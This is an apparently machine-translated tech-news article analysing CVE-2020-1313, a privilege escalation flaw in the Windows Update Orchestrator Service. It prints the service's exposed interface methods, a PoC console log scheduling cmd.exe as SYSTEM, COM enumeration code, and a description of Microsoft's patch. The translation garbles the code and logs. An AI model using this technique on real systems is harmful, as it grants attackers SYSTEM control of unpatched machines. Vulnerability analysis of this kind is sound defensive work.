Shulou(Shulou.com)05/31 Report--

In this issue, the editor will bring you about how to analyze CVE-2020-1313 vulnerabilities and make use of PoC. The article is rich in content and analyzes and narrates it from a professional point of view. I hope you can get something after reading this article.

Windows Update Orchestrator Service is a DCOM service that other components in the Windows system need to use to install downloaded Windows updates. However, because the code in the service has problems in authenticating and calling functions, it is vulnerable to privilege escalation attacks, that is, arbitrary users are elevated to local system privileges. This vulnerability will affect Windows 10 and Windows Server Core products.

Loophole analysis

The UniversalOrchestrator service (9C695035-48D2-4229-8B73-4C70E756E519), whose code is implemented in usosvc.dll and will run with NT_AUTHORITY\ SYSTEM permissions, can be configured if you have access to BUILTIN\ Users. Even though the COM class enumeration implemented by the service is masked, the IUniversalOrchestrator interface (c53f3549-0dbf-429a-8297-c812ba00742d) can still be accessed through standard COM API calls. Here are three ways to expose:

Virtual HRESULT _ _ stdcall HasMoratoriumPassed (wchar_t* uscheduledId, int64_t* p1); / / usosvcfolk Universal Orchestrator Velcro HasMoratoriumPasse virtual HRESULT _ stdcall ScheduleWork (wchar_t* uscheduledId, wchar_t* cmdLine, wchar_t* startArg, wchar_t* pauseArg); / / usosvvcations Universal OrchestratorVue ScheduleWorkvirtual HRESULT _ stdcall WorkCompleted (wchar_t* uscheduledId, int64_t p1); / / usosvcfolk Universal Orchestratorvirtual HRESULT _ stdcall WorkCompleted (wchar_t* uscheduledId, int64_t p1)

The ScheduleWork method can be used to set scheduled tasks for command execution in the context of the service, and can be executed without any authentication. The target executable itself must have a digital signature and must be located in the "c:\ windows\ system32" or "Program Files" directory. However, we can also execute the target executable through command-line arguments, so that we can elevate the target system by starting "c:\ windows\ system32\ cmd.exe" and executing arbitrary code with NT_AUTHORITY\ SYSTEM privileges.

Proof of concept PoCC:\ 111 > whoamidesktop-43rnlku\ unprivileged C:\ 111 > whoami / priv PRIVILEGES INFORMATION-- Privilege Name Description State== SeShutdownPrivilege Shutdown the system DisabledSeChangeNotifyPrivilege Bypass traverse checking EnabledSeUndockPrivilege Remove computer from docking station DisabledSeIncreaseWorkingSetPrivilege Increase a process working set DisabledSeTimeZonePrivilege Change the time zone Disabled C:\ 111l > whoami / priv C:\ 111l > UniversalOrchestratorPrivEscPoc.exeObtaining reference to IUniversalOrchestratorScheduing work with id 56594Succeeded. You may verify HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ WindowsUpdate\ Orchestrator\ UScheduler to see the task has indeed been onboarded. The command itself will be executed overnight if there is no user interaction on the box or after 3 days SLA has passed. The entry point for the scheduled task is added to the registry:

The specified command can be executed at night (about 23:20) without any user interaction.

Vulnerability discovery process

When I found that we couldn't get the interface definition of the USO service through OleView.NET, I created a script specifically to traverse a large number of CLSID/IID compositions. As a result, we found the following:

Void TestUpdateOrchestratorInterfaceAgainstService (IID& clsId, const char* className, const wchar_t* iidStr, const char* interfaceName) {void * ss = NULL;IID iid;ThrowOnError (IIDFromString (iidStr, (LPCLSID) & iid)); / / working with eat the end, failing with anything else HRESULT res = CoCreateInstance (clsId, nullptr, CLSCTX_LOCAL_SERVER, iid, (LPVOID*) & ss); printf ("% s% s:% s\ n", className, interfaceName, res = S_OK? "WORKING": "failure");} void TestUpdateOrchestratorInterface (const wchar_t* iidStr, const char * interfaceName) {/ / TestUpdateOrchestratorInterfaceAgainstService (CLSID_AutomaticUpdates, "AutomaticUpdates", iidStr, interfaceName); / / timeoutingbound TestUpdateOrchestratorInterfaceAgainstService (CLSID_UxUpdateManager, "UxUpdateManager", iidStr, interfaceName); TestUpdateOrchestratorInterfaceAgainstService (CLSID_UsoService, "UsoService", iidStr, interfaceName); TestUpdateOrchestratorInterfaceAgainstService (CLSID_UpdateSessionOrchestrator, "UpdateSessionOrchestrator", iidStr, interfaceName); TestUpdateOrchestratorInterfaceAgainstService (CLSID_UniversalOrchestrator, "UniversalOrchestrator", iidStr, interfaceName) / / TestUpdateOrchestratorInterfaceAgainstService (CLSID_SomeService, SomeService, iidStr, interfaceName); / / timeouting!}. TestUpdateOrchestratorInterface (L "{c57692f8-8f5f-47cb-9381-34329b40285a}", "IMoUsoOrchestrator"); TestUpdateOrchestratorInterface (L "{4284202d-4dc1-4c68-a21e-5c371dd92671}", "IMoUsoUpdate"); TestUpdateOrchestratorInterface (L "{c879dd73-4bd2-4b76-9dd8-3b96113a2130}", "IMoUsoUpdateCollection"); / /. The execution result of the and hundreds of more method is as follows: UniversalOrchestrator IUniversalOrchestrator: WORKINGUpdateSessionOrchestrator IUpdateSessionOrchestrator: WORKINGUxUpdateManager IUxUpdateManager: WORKING

Next, I began to perform reverse engineering analysis of the above methods and found the vulnerabilities introduced in this article.

Vulnerability repair

Microsoft has fixed this issue by adding CoImpersonateClient API calls to the vulnerability patch in June 2020.

Before deploying the vulnerability patch, the implementation code of the method is as follows:

After the vulnerability patch is deployed, the implementation code of the method is as follows:

In fact, identity masquerading is actually done at the beginning of processing the request, so the API call to update the registry is performed in the caller's security context. If the caller does not have advanced access to the HKEY_LOCAL_MACHINE, the USO API method cannot be executed.

The above is the editor for you to share how to carry out CVE-2020-1313 vulnerability analysis and the use of PoC, if you happen to have similar doubts, you might as well refer to the above analysis to understand. If you want to know more about it, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.